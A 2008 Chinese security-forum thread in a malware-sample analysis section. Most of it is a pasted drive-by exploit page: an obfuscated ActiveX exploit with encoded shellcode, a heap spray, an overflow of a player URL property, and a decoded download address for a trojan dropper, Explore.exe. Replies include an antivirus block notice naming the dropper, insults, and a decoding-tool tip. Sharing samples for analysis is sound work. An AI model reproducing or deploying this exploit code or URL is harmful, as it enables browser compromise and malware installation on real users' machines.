收藏本站 |切换到宽版 | 更换论坛皮肤
 找回密码  忘记邮箱  QQ快速登录  快速登录  快速注册

卡饭»论坛 安全区 病毒样本 分享&分析区 网页解密
返回列表 发新帖
查看: 4176|回复: 4
收起左侧

[其他相关] 网页解密

[复制链接]
250662772
发表于 2008-12-2 13:14:17 | 显示全部楼层 |阅读模式

<SCRIPT>window.onerror=function(){return true;}</SCRIPT>
<SCRIPT>
document.writeln("<object classid=\"cl\"+\"sid:\"+\"F3\"+\"E7\"+\"0C\"+\"EA-\"+\"95\"+\"6E-\"+\"49\"+\"CC\"+\"-B4\"+\"44-\"+\"73\"+\"AFE5\"+\"93\"+\"AD7F\" id=\"YuTian\"><\/object>");
document.writeln("<SCRIPT language=\"JavaScript\">");
document.writeln("var YloveI,IloveY,ShengFeng1,QuadroSCR,QuadroXFX;");
document.writeln("var CnYt1,CnYt2,CnYt3,CnYt4,str5,CnYt6,CnYt7,CnYt8,CnYt9,Samsung10;");
document.writeln("var str3,str2,CnYt8A3d,CnYt8A4d,str4,CnYt8A6d,CnYt8A7d,CnYt8A8d,CnYt8A9d,CnYt8A10;");
document.writeln("str3 = unescape(\"YT2\"+\"f2f\");\/\/(\"YTce4eYT4b62YT3a67\"+\"YT8698YTdf57\"+\"YT2d5eYT7753YT0c80\"+\"YT\");");
document.writeln("CnYt8A4d = unescape(\"YT\"+\"2e31\");\/\/(\"YT8476YT858d\"+\"YT8485YTce98\"+"\YT2857YT7065YT0178YTf876YT\");");
document.writeln("str2 = unescape(\"YT7375\");\/\/(\"YT3a67YT025eYT3a57YT1385YTf65eYT0cffYT8259YTca4eYT\");");
document.writeln("CnYt8A3d = unescape(\"YT7\"+\"265\");\/\/(\"YT6153YT4772YTf876YT3a67YT3175YT8e4eYTf665YT1a5cYT\");");
document.writeln("CnYt8A6d = unescape(\"YT2\"+\"e37\");\/\/(\"YTbf4f\"+\"YT3a64\"+\"YT497b\"+\"YT7972\"+\"YT288dYT0c80YT3a4eYT886dYT\");");
document.writeln("CnYt8A8d = unescape(\"YT\"+\"6162\");\/\/(\"YT398dYT0580YT7351YTe86cYT0230YT6153YT4772YT3a67YT\");");
document.writeln("CnYt8A10 = unescape(\"YT0073\");\/\/(\"YT1062YT3a4eYT174fYT8253YT4655YT894eYTf876YTfd8fYT\");");
document.writeln("str4 = unescape(\"YT3231\"+\"YT322d\");\/\/(\"YTf95bYT618c\"+\"YT0cff\"+\"YT227dYT3c5cYT9f8fpsYT\");");
document.writeln("CnYt8A7d = unescape(\"YT6\"+\"56e\"+\"YT2f74\");\/\/(\"YT4e17YT533aYT7261YT6747YT4e3aYT5c13psYT\");");
document.writeln("CnYt8A9d = unescape(\"YT2\"+\"e6b\"+\"YT7363\");\/\/(\"YT5e3cYT76b7YT5384YTfb7cYT1752YT0130psYT\");");
document.writeln("CnYt1 = unescape(\"YT4\"+\"343\"+\"YT4343YT4343\");\/\/(\"YT7c69YT52fbYT3017YT6701YT4e7epsYT\");");
document.writeln("CnYt3 = unescape(\"YTf\"+\"78b\"+\"YT046aYTe859\"+\"YT0043YT0000YTf9e2YT6f68\"+\"YT006eYT6800YT7275YT6d6c\");");
document.writeln("CnYt2 = unescape(\"YTa3e9YT0000YT5f00YTa164YT0030YT0000YT408bYT8b0cYT1c70YT8badYT0868\");");
document.writeln("Samsung10 = unescape(\"YTc1ecYTe579YT98b8YT8afeYTef0eYTe0ceYT3660YT2f1aYT6870YT7474YT3a70\");");
document.writeln("CnYt8 = unescape(\"YTcbc1YT030dYT40daYTf1ebYT1f3bYTe775YT8b5eYT245eYTdd03YT8b66YT4b0c\");");
document.writeln("CnYt4 = unescape(\"YTff54YT9516YT2ee8YT0000YT8300YT20ecYTdc8bYT206aYTff53YT0456YT04c7\");");
document.writeln("str5 = unescape(\"YT5c03YT2e61YTc765YT0344YT7804YT0065YT3300YT50c0YT5350YT5057YT56ff\");");
document.writeln("CnYt7 = unescape(\"YT8b56YT2076YTf503YTc933YT4149YT03adYT33c5YT0fdbYT10beYTd63aYT0874\");");
document.writeln("CnYt9 = unescape(\"YT5e8bYT031cYT8bddYT8b04YTc503YT5eabYTc359YT58e8YTffffYT8effYT0e4e\");");
document.writeln("CnYt6 = unescape(\"YT8b10YT50dcYTff53YT0856YT56ffYT510cYT8b56YT3c75YT748bYT782eYTf503\");");
document.writeln("IloveY = CnYt1+CnYt2+CnYt3+CnYt4+str5+CnYt6+CnYt7+CnYt8+CnYt9+Samsung10;");
document.writeln("YloveI = str3+str2+CnYt8A3d+CnYt8A4d+str4+CnYt8A6d+CnYt8A7d+CnYt8A8d+CnYt8A9d+CnYt8A10;");
document.writeln("ShengFeng1 = unescape(\"YT7468YT7074YT2F3AYT772FYT7777YT672EYT6F6FYT6C67YT2E65YT6F63YT2E6DYT3035YT626EYT632EYT6D6FYT6C2FYT6E69YT2F6BYT7845YT6C70YT726FYT2E65YT7865YT0065YT0000\");");
document.writeln("var QuadroSCR = \"YT4343YT4343YT4343YTa3e9YT0000YT5f00YTa164YT0030YT0000YT408bYT8b0cYT1c70YT8badYT0868YTf78bYT046aYTe859YT0043YT0000YTf9e2YT6f68YT006eYT6800YT7275YT6d6cYTff54YT9516YT2ee8YT0000YT8300YT20ecYTdc8bYT206aYTff53YT0456YT04c7YT5c03YT2e61YTc765YT0344YT7804YT0065YT3300YT50c0YT5350YT5057YT56ffYT8b10YT50dcYTff53YT0856YT56ffYT510cYT8b56YT3c75YT748bYT782eYTf503YT8b56YT2076YTf503YTc933YT4149YT03adYT33c5YT0fdbYT10beYTd63aYT0874YTcbc1YT030dYT40daYTf1ebYT1f3bYTe775YT8b5eYT245eYTdd03YT8b66YT4b0cYT5e8bYT031cYT8bddYT8b04YTc503YT5eabYTc359YT58e8YTffffYT8effYT0e4eYTc1ecYTe579YT98b8YT8afeYTef0eYTe0ceYT3660YT2f1aYT7474YT3a70YT2f2fYT7777YT2e77YT6d7aYT6a6aYT796aYT2e79YT6e63YT6e2fYT7765YT612fYT3335YT632eYT7373\";");
document.writeln("QuadroXFX = unescape(QuadroSCR.replace(\/YT\/g,\"\\x25\"+\"\\x75\"));");
document.writeln("var Virus = 0x100000;");
document.writeln("var ActivePerl = 0x0c0c0c0c;");
document.writeln("var DrWeb = QuadroXFX.length * 2;");
document.writeln("var Norton = Virus - (DrWeb+0x38);");
document.writeln("var AntiVir = unescape(\"%\"+\"u\"+\"0\"+\"D\"+\"0\"+\"D\"+\"%\"+\"u\"+\"0\"+\"D\"+\"0\"+\"D\");");
document.writeln("AntiVir = getSpraySlide(AntiVir,Norton);");
document.writeln("");
document.writeln("Ewido = (ActivePerl - 0x100000)\/Virus;");
document.writeln("Mcafee = new window[\"\\x41\"+\"\\x72\"+\"\\x72\"+\"\\x61\"+\"\\x79\"]();");
document.writeln("for (i=0;i<Ewido;i++)");
document.writeln("{");
document.writeln("Mcafee = AntiVir + QuadroXFX;");
document.writeln("}");
document.writeln("function getSpraySlide(AntiVir, Norton)");
document.writeln("{");
document.writeln("while (AntiVir.length*2<Norton)");
document.writeln("{");
document.writeln("AntiVir += AntiVir;");
document.writeln("}");
document.writeln("AntiVir = AntiVir.substring(0,Norton\/2);");
document.writeln("return AntiVir;");
document.writeln("}");
document.writeln("var size_buff = 1070;");
document.writeln("var x =  unescape(\"%0c\"+\"%0c\"+\"%0c\"+\"%0c\");");
document.writeln("while (x.length<size_buff) x += x;");
var kav="SB";
document.writeln("YuTian[\"\\x46\"+\"\\x6c\"+\"\\x76\"+\"\\x50\"+\"\\x6c\"+\"\\x61\"+\"\\x79\"+\"\\x65\"+\"\\x72\"+\"\\x55\"+\"\\x72\"+\"\\x6c\"] = x;");
var kavv="SB";
document.writeln("<\/script>");
var kavvv="SB";
</SCRIPT><SCRIPT>
var kavvvv="SB";
document.writeln("<script>");
document.writeln("location.replace(\"\\x61\"+\"\\x62\"+\"\\x6f\"+\"\\x75\"+\"\\x74\"+\"\\x3a\"+\"\\x62\"+\"\\x6c\"+\"\\x61\"+\"\\x6e\"+\"\\x6b\");");
document.writeln("<\/script>");
</SCRIPT>

病毒网址我知道在红色部分YT7468YT7074YT2F3AYT772FYT7777YT672EYT6F6FYT6C67YT2E65YT6F63YT2E6DYT3035YT626EYT632EYT6D6FYT6C2FYT6E69YT2F6BYT7845YT6C70YT726FYT2E65YT7865YT0065YT0000
难道还要手动替换YT为%u再用shellcode解密
http://www.google.com.50nb.com/link/Explore.exe

有没有简单点方法?
回复

举报

fsl
发表于 2008-12-2 13:23:00 | 显示全部楼层
没有
你在吃饭的时候可以不嘴巴吗,直接放到胃里吧,这个最直接
回复

举报

250662772
 楼主| 发表于 2008-12-2 13:39:50 | 显示全部楼层
原帖由 fsl 于 2008-12-2 13:23 发表
没有
你在吃饭的时候可以不嘴巴吗,直接放到胃里吧,这个最直接

没有就没有,你吃饭直接去厕所更省事
回复

举报

VISN
发表于 2008-12-2 13:41:36 | 显示全部楼层
Access to the data has been denied!
Warning: A virus or unwanted program has been found in the HTTP Data.

Requested URL:  http://www.google.com.50nb.com/link/Explore.exe
Information:  Is the TR/Dropper.Gen Trojan  


--------------------------------------------------------------------------------
Generated by AntiVir WebGuard 8.0.15.0, AVE 8.2.0.36, VDF 7.1.0.170
回复

举报

granthill
发表于 2008-12-2 14:36:42 | 显示全部楼层

回复 1楼 250662772 的帖子

freshow里有 replace功能
回复

举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-7-16 00:30 , Processed in 0.143001 second(s), 16 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表